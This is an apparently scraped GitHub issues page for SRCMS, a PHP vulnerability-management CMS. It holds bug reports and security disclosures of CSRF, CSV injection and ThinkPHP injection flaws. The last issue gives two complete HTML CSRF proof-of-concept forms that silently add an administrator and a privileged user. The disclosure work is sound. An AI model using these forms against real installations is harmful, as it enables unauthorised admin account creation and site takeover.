martinzhou2015 / srcms Goto Github PK
View Code? Open in Web Editor NEWSRCMS企业应急响应与缺陷管理系统
srcms's People
Contributors
Stargazers
Watchers
Forkers
beyond1983 hongxs znanl 5up3rc yaoyi2008 lzpfmh yocruzer loveshell bupt007 yyxxzz bajief cnxs jacobjacob thinhnd8752 ccavxx chinayin tycheo mathchao gamehacker sampr0 sdgdsffdsfff gdsellerpd enzo1999 daysdays r00tak xcorp1986 andyongithub qiuai q-jone haoirui kevaxe hackbraid cihaobeihei beefcrack zhangweiwei0326 quiteme kiang70 pysec odin1314 aefdr wangyx0055 qhwlpg wstart jnan77 key20 opensise 80000v kkqy bg6aer vf3ng hxp2k6 guoyu07 wuyouzi newaynewlife cs24 ning1022 cryptedwolf yi6ei2ifd toysweet jijicanyu monsterzer0 purplehua aylhex feixuezhi awesome-security 957204459 sec-u itiki iicoming frankchongli sovince v1cker copra2005 ccaac yuchangyang lianghanquan everpost nlazy skskevin chennqqi beyondblog samueltt onsdk antime aerfa21 fulamenge aduan tuian zminjiao webvul k2vin xiaoyinchong shiliuxing ldbqh spr1ngbr0ther 1033163112 liusec goblinintree qqgirllianxin yuzhouheikesrcms's Issues
srcms普通用户权限
普通用户不能更改自己的信息,报出的错误是非法请求
too many bugs are there in this cms
change password
undefined variable $Page.
class HallController extends Controller{
public function index($key="")
{
if($key == ""){
$model = M('member');
}else{
$where['title'] = array('like',"%$key%");
$where['name'] = array('like',"%$key%");
$where['_logic'] = 'or';
$model = M('member')->where($where);
}
$user = $model->limit($Page->firstRow.','.$Page->listRows)->where($where)->order('jifen ASC')->where('type=1')->select();
$xuhao = 1;
$tmodel= M('setting');
$title = $tmodel->where('id=1')->select();
$this->assign('title', $title);
$this -> assign('xuhao',$xuhao);
$this->assign('user',getSortedCategory($user));
$this->display();
}
}undefined variable $Page.
管理后台设计bug
复现过程:
- 注册用户test
- test用户提交漏洞A,B,C,D
- admin用户登录后台删除test用户
- 漏洞A,B,C,D 依然保留在post表中,但是管理后台无法查看这些历史漏洞了。
期望:
只要曾经提交过的漏洞,无论提交者是否还存在这个平台,历史漏洞信息都应该能在管理后台查看。
安全问题
您好:
我是360代码代码卫士的工作人员,在我们的开源项目代码检测过程中,发现SRCMS存在两处CSRF,详细信息如下:
第一处在后台订单删除处(GET型csrf):
可以看到没有防护,可以进行csrf,遍历报告id,可以删除所有的报告。
第二处在系统设置--基础配置处
访问构造的页面,能成功修改配置
其次,我发现cms使用的TP3.2.3中,有已知的框架sql注入没有修复,如TP的order by注入,但由于没有在项目中使用到order(),所以也无法复现。不过由于SRCMS的不断更新,难免不会用到,还是建议修复下好些~~
testbug
testbug
a bug
\Admin\Controller\ManagerController.class.php , line 29, "$model = M('member')->where($where);" , 'member' should be 'manager'. : )
admin 账号更新信息有错误提示
.<
Too few arguments to function I(), 0 passed in /Applications/XAMPP/xamppfiles/htdocs/Application/Admin/Controller/SettingController.class.php on line 41 and at least 1 expected
错误位置
FILE: /Applications/XAMPP/xamppfiles/htdocs/ThinkPHP/Common/functions.php LINE: 271
TRACE
#0 /Applications/XAMPP/xamppfiles/htdocs/Application/Admin/Controller/SettingController.class.php(41): I()
#1 [internal function]: Admin\Controller\SettingController->update()
#2 /Applications/XAMPP/xamppfiles/htdocs/ThinkPHP/Library/Think/App.class.php(173): ReflectionMethod->invoke(Object(Admin\Controller\SettingController))
后台更改网站相关配置时显示配置更新失败
后台更改网站相关配置时显示配置更新失败,但是数据库中的信息已经更改,前台的却没有更改
SRCMS V3正式版开发
Hi all,
为了进一步完善SRCMS的功能,带来更好的安装和用户体验,SRCMS V3系列已经着手开发,考虑到开发版本更新频率较为频繁,且功能变动多,因此SRCMS V3开发版本将会托管在新的SRCMS-dev项目中,您可以通过以下地址获取到最新版本的SRCMS V3开发版本:
https://github.com/martinzhou2015/SRCMS-dev
接下来的开发计划,包括后端代码重写(将使用的ThinkPHP 3.2.3框架,升级到ThinkPHP5.0或使用其他框架),功能的优化和完善等。V3正式版本的开发计划将会在本Issue中进行跟踪。
如果您有任何建议或意见欢迎在下方留言,或通过Email联系到我。
Martin
你好,请问你这个Thinkphp用的哪个版本的?
你好,请问你这个Thinkphp用的哪个版本的?
web页面Admin账号无法正常登陆
账户中心/更新个人信息失败
更新个人信息,提交任何内容都提示非法请求
ueditor编辑器,上传图片处可枚举
如题
[2016-12-3] ChangeController.class.php逻辑缺陷 By.藏形匿影
问题描述:
//验证原密码 $user = $member->where(array('id'=>$id,'password'=>$oldpassword))->find(); if(!$user) { $this->error('旧密码校验失败 :(') ;
因为V1.7新版本存储密码时,添加了salt字符防护,此处校验逻辑未做修改,导致出现问题。
问题解决:
· 优化此处处理逻辑,排查其他涉及密码的部分。
生成工单 不正确
在测试的时候发现生成工单根据session_id查询不正确,具体表现在查询A工单可能得到B工单的内容。是个bug?
A CSV injection
Payload:
1.user 'test' submit a report
2admin export report
3.open the report
Table 'srcms.hall' doesn't exist
有联系方式吗? 请提供一个
部署问题
Too few arguments to function I(), 0 passed in /usr/local/nginx/html/Application/User/Controller/InfoController.class.php on line 29 and at least 1 expected
这是什么情况,提交更新普通用户信息的时候,提示这个问题,求解答
没办法上传图片
上传的图片路径貌似不对,windows系统
admin.php页面Admin无法登陆
大佬 admin.php页面用提供的Admin/Admin用户名密码无法登陆啊!!!
There is two CSRF vulnerability that can add the administrator account
After the administrator logged in, open the following two page
poc:
add_admin.html
<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=manager&a=add" method="post">
<div class="form-group">
<label>用户名</label>
<input class="form-control" type="text" name="username" value="csrf">
</div>
<div class="form-group">
<label>邮箱</label>
<input class="form-control" type="text" name="email" value="[email protected]">
</div>
<div class="form-group">
<label>密码</label>
<input class="form-control" type="password" name="password" value="123456">
</div>
<div class="form-group">
<label>确认密码</label>
<input class="form-control" type="password" name="repassword" value="123456">
</div>
<div class="form-group">
<button class="btn btn-success" type="submit" >添加</button>
</div>
</form>
</html>
add_user.html
<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=member&a=add" method="post">
<div class="form-group">
<label>用户名</label>
<input class="form-control" type="text" name="username" value="test">
</div>
<div class="form-group">
<label>邮箱</label>
<input class="form-control" type="text" name="email" value="[email protected]">
</div>
<div class="form-group">
<label>密码</label>
<input class="form-control" type="password" name="password" value="123456">
</div>
<div class="form-group">
<label>确认密码</label>
<input class="form-control" type="password" name="repassword" value="123456">
</div>
<div class="form-group">
<label>用户等级</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="1" >路人
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="2" >实习白帽子
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="3" >普通白帽子
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" checked="checked" value="4" >核心白帽子
</label>
</div>
<div class="form-group">
<label>用户状态</label>
<label class="radio-inline">
<input type="radio" name="status" id="status" value="0">禁止登陆
</label>
<label class="radio-inline">
<input type="radio" name="status" id="status" value="1" checked="checked">正常
</label>
</div>
<div class="form-group">
<button class="btn btn-success" type="submit" >添加</button>
</div>
</form>
</html>
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.